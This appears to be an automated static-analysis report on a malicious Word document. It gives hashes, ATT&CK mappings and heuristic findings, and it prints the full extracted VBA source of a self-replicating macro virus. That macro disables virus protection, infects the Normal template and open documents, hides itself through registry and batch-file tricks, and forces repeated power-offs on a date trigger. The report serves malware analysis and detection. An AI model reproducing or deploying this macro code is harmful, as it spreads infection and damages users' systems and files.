Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164e03519bb49246…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 30.0 KB
Created: 2000-10-11 17:35:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 228c91b5dbff3d01659c0fff0afb92cc
SHA-1: 11707bae13b5fff8ac9defb3c91d01271d49d2b8
SHA-256: 164e03519bb492462a2734d45473aadedf774d6a7c5e620162f24f7bb34bc58c
Risk score: 168

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1505.003 Server Software Component: Service Execution
  • T1059 Command and Scripting Interpreter

The sample is a Microsoft Word document containing a Document_Open VBA macro. This macro is designed to copy itself into the Normal template and the active document, effectively infecting them. It also utilizes the Shell() function, indicating an intent to execute arbitrary commands or payloads. The macro attempts to achieve AV stealth by modifying registry keys related to file associations.

Heuristics (5)

  • VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
  • Document_Open macro (high) [OLE_VBA_DOCOPEN]
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (environment variable access) (low) [OLE_VBA_ENVIRON]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3343 bytes
SHA-256: 6bd02220373e28af9548082fcaf7cf1d7715d3b59ed1503349b857f9584ded8e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False
ShellDoc = Environ("WINDIR") & "\ShellNew\" & System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)

If Normal.ThisDocument.ReadOnly = 0 Then
    NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
    NormalTemplate.Save
Else
    SetAttr (NormalTemplate.FullName), vbArchive
End If

If ActiveDocument.ReadOnly = 0 Then
    AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode
    ActiveDocument.Save
End If

'>-- Check if we are Master Document
If UCase(ActiveDocument.FullName) = UCase(ShellDoc) Then
    ActiveDocument.Save
    NormalTemplate.Saved = True
    Application.Quit
End If

'>-- Infect Master Document
If ND.CountOfLines > 25 Then
    If GetAttr(ShellDoc) <> 0 Then
        SetAttr (ShellDoc), 0
        Shell Application.Path & "\Winword.exe " & ShellDoc, vbMinimizedNoFocus
    End If
End If
'AV Stealth in: HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew Filename
Randomize Timer
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
STL = "Ver_" & Int(Rnd * 9999) & ".dat"
If UCase(chkSt) <> Right(ShellDoc, Len(ShellDoc) - 12) Then Name ShellDoc As Environ("WinDir") & "\ShellNew\" & STL
System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename") = STL

'Reinkanation:
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
FileCopy NormalTemplate.FullName, Environ("WinDir") & "\Java\X.cls" 'Copy NormalTemplate
FileCopy Environ("WINDIR") & "\ShellNew\" & chkSt, Environ("WinDir") & "\Java\Y.cls"    'Copy Winword8.doc
x = Int(Rnd * 55) + 200: y = Int(Rnd * 19) + 238: z = Int(Rnd * 30) + 21    'Random numbers

Open "Tarnkappe.bat" For Output As #1
    Print #1, "ren " & Environ("WinDir") & "\Java\X.cls " & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls"
    Print #1, "ren " & Environ("WinDir") & "\Java\Y.cls " & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls"
    Print #1, "del Tarnkappe.bat"
Open Environ("WinDir") & "\Winstart.bat" For Output As #2
    Print #2, "@echo off"
    Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls " & NormalTemplate.FullName
    Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls " & Environ("WinDir") & "\ShellNew\" & chkSt
Close
Shell "Tarnkappe.bat", vbHide

Eclipse:
If Day(Now) <> Month(Now) Then Exit Sub
Do
Shell Environ("WinDir") & "\Rundll32.exe Kernel32,SetSystemPowerState", vbHide  'The lord says power off
Loop
End Sub